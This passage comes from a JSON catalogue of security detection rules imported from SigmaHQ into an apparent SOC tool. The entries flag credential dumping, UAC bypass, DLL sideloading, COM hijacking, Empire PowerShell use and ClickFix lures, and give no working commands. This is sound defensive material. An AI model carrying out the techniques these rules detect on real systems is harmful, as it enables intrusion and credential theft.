"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" } }, { "id": "sigmahq-sigma-780601d1-6376-4f2a-884e-b8d45599f78c", "type": "detection", "name": "Google Workspace MFA Disabled", "description": "Detects when multi-factor authentication (MFA) is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-mfa-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "780601d1-6376-4f2a-884e-b8d45599f78c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_mfa_disabled.yml" } }, { "id": "sigmahq-sigma-782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "type": "detection", "name": "RDP Port Forwarding Rule Added Via Netsh.EXE", "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-port-forwarding-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml" } }, { "id": "sigmahq-sigma-7864a175-3654-4824-9f0d-f0da18ab27c0", "type": "detection", "name": "Password Set to Never Expire via WMI", "description": "Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-set-to-never-expire-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7864a175-3654-4824-9f0d-f0da18ab27c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmi_password_never_expire.yml" } }, { "id": "sigmahq-sigma-786cdae8-fefb-4eb2-9227-04e34060db01", "type": "detection", "name": "Suspicious Wordpad Outbound Connections", "description": "Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\nThis might indicate potential process injection activity from a beacon or similar mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wordpad-outbound-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "786cdae8-fefb-4eb2-9227-04e34060db01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml" } }, { "id": "sigmahq-sigma-7892ec59-c5bb-496d-8968-e5d210ca3ac4", "type": "detection", "name": "DPAPI Backup Keys And Certificate Export Activity IOC", "description": "Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555", "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-backup-keys-and-certificate-export-activity-ioc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7892ec59-c5bb-496d-8968-e5d210ca3ac4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml" } }, { "id": "sigmahq-sigma-7899144b-e416-4c28-b0b5-ab8f9e0a541d", "type": "detection", "name": "Okta Application Modified or Deleted", "description": "Detects when an application is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-application-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_application_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-78a34b67-3c39-4886-8fb4-61c46dc18ecd", "type": "detection", "name": "Microsoft 365 - Unusual Volume of File Deletion", "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-unusual-volume-of-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml" } }, { "id": "sigmahq-sigma-78a80655-a51e-4669-bc6b-e9d206a462ee", "type": "detection", "name": "Install Root Certificate", "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/install-root-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78a80655-a51e-4669-bc6b-e9d206a462ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" } }, { "id": "sigmahq-sigma-78aa1347-1517-4454-9982-b338d6df8343", "type": "detection", "name": "Powershell MsXml COM Object", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-msxml-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78aa1347-1517-4454-9982-b338d6df8343", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" } }, { "id": "sigmahq-sigma-78b3756a-7804-4ef7-8555-7b9024a02e2d", "type": "detection", "name": "AWS S3 Data Management Tampering", "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-s3-data-management-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml" } }, { "id": "sigmahq-sigma-78bc5783-81d9-4d73-ac97-59f6db4f72a8", "type": "detection", "name": "Relevant Anti-Virus Signature Keywords In Application Log", "description": "Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/relevant-anti-virus-signature-keywords-in-application-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/Other/win_av_relevant_match.yml" } }, { "id": "sigmahq-sigma-78cc2dd2-7d20-4d32-93ff-057084c38b93", "type": "detection", "name": "Antivirus Password Dumper Detection", "description": "Detects a highly relevant Antivirus alert that reports a password dumper.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003", "T1558", "T1003.001", "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-password-dumper-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78cc2dd2-7d20-4d32-93ff-057084c38b93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_password_dumper.yml" } }, { "id": "sigmahq-sigma-78d5cab4-557e-454f-9fb9-a222bd0d5edc", "type": "detection", "name": "External Remote SMB Logon from Public IP", "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-remote-smb-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78d5cab4-557e-454f-9fb9-a222bd0d5edc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" } }, { "id": "sigmahq-sigma-78f10490-f2f4-4d19-a75b-4e0683bf3b8d", "type": "detection", "name": "Suspicious Speech Runtime Binary Child Process", "description": "Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.\nChild processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-speech-runtime-binary-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78f10490-f2f4-4d19-a75b-4e0683bf3b8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_speechruntime_child_process.yml" } }, { "id": "sigmahq-sigma-790317c0-0a36-4a6a-a105-6e576bf99a14", "type": "detection", "name": "COM Object Hijacking Via Modification Of Default System CLSID Default Value", "description": "Detects potential COM object hijacking via modification of default system CLSID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-object-hijacking-via-modification-of-default-system-clsid-default-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "790317c0-0a36-4a6a-a105-6e576bf99a14", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml" } }, { "id": "sigmahq-sigma-79609c82-a488-426e-abcf-9f341a39365d", "type": "detection", "name": "All Rules Have Been Deleted From The Windows Firewall Configuration", "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/all-rules-have-been-deleted-from-the-windows-firewall-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79609c82-a488-426e-abcf-9f341a39365d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" } }, { "id": "sigmahq-sigma-797011dc-44f4-4e6f-9f10-a8ceefbe566b", "type": "detection", "name": "WMI Backdoor Exchange Transport Agent", "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-backdoor-exchange-transport-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" } }, { "id": "sigmahq-sigma-799a5f48-0ac1-4e0f-9152-71d137d48c2a", "type": "detection", "name": "Abusable DLL Potential Sideloading From Suspicious Location", "description": "Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abusable-dll-potential-sideloading-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "799a5f48-0ac1-4e0f-9152-71d137d48c2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" } }, { "id": "sigmahq-sigma-79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "type": "detection", "name": "Msiexec Quiet Installation", "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msiexec-quiet-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" } }, { "id": "sigmahq-sigma-79b06761-465f-4f88-9ef2-150e24d3d737", "type": "detection", "name": "Potential SysInternals ProcDump Evasion", "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sysinternals-procdump-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79b06761-465f-4f88-9ef2-150e24d3d737", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml" } }, { "id": "sigmahq-sigma-79ce34ca-af29-4d0e-b832-fc1b377020db", "type": "detection", "name": "Whoami.EXE Execution From Privileged Process", "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-from-privileged-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml" } }, { "id": "sigmahq-sigma-79df3f68-dccb-48e9-9171-b75cbc37c51d", "type": "detection", "name": "Potential Lateral Movement via Windows Remote Shell", "description": "Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-lateral-movement-via-windows-remote-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79df3f68-dccb-48e9-9171-b75cbc37c51d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml" } }, { "id": "sigmahq-sigma-79f4ede3-402e-41c8-bc3e-ebbf5f162581", "type": "detection", "name": "HackTool - Empire PowerShell Launch Parameters", "description": "Detects suspicious powershell command line parameters used in Empire", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-empire-powershell-launch-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" } }, { "id": "sigmahq-sigma-7a01183d-71a2-46ad-ad5c-acd989ac1793", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - Process", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-7a02e22e-b885-4404-b38b-1ddc7e65258a", "type": "detection", "name": "Suspicious Schtasks Schedule Type With High Privileges", "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-schedule-type-with-high-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml" } }, { "id": "sigmahq-sigma-7a14080d-a048-4de8-ae58-604ce58a795b", "type": "detection", "name": "Remote File Copy", "description": "Detects the use of tools that copy files from or to remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/remote-file-copy.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a14080d-a048-4de8-ae58-604ce58a795b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_file_copy.yml" } }, { "id": "sigmahq-sigma-7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e", "type": "detection", "name": "Suspicious Space Characters in RunMRU Registry Path - ClickFix", "description": "Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-space-characters-in-runmru-registry-path-clickfix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_runmru_space_character.yml" } }, { "id": "sigmahq-sigma-7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "type": "detection", "name": "Access To Windows Credential History File By Uncommon Applications", "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-windows-credential-history-file-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_credhist.yml" } }, { "id": "sigmahq-sigma-7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35", "type": "detection", "name": "Potential JLI.dll Side-Loading", "description": "Detects potential DLL side-loading of jli.dll.\nJLI.dll has been observed being side-loaded by Java processes by various threat actors, including APT41, XWorm,\nand others in order to load malicious payloads in context of legitimate Java processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-jli-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_jli.yml" } }, { "id": "sigmahq-sigma-7a4409fc-f8ca-45f6-8006-127d779eaad9", "type": "detection", "name": "LoadBalancer Security Group Modification", "description": "Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\nThis can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loadbalancer-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a4409fc-f8ca-45f6-8006-127d779eaad9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml" } }, { "id": "sigmahq-sigma-7a4d9232-92fc-404d-8ce1-4c92e7caf539", "type": "detection", "name": "HackTool - Stracciatella Execution", "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 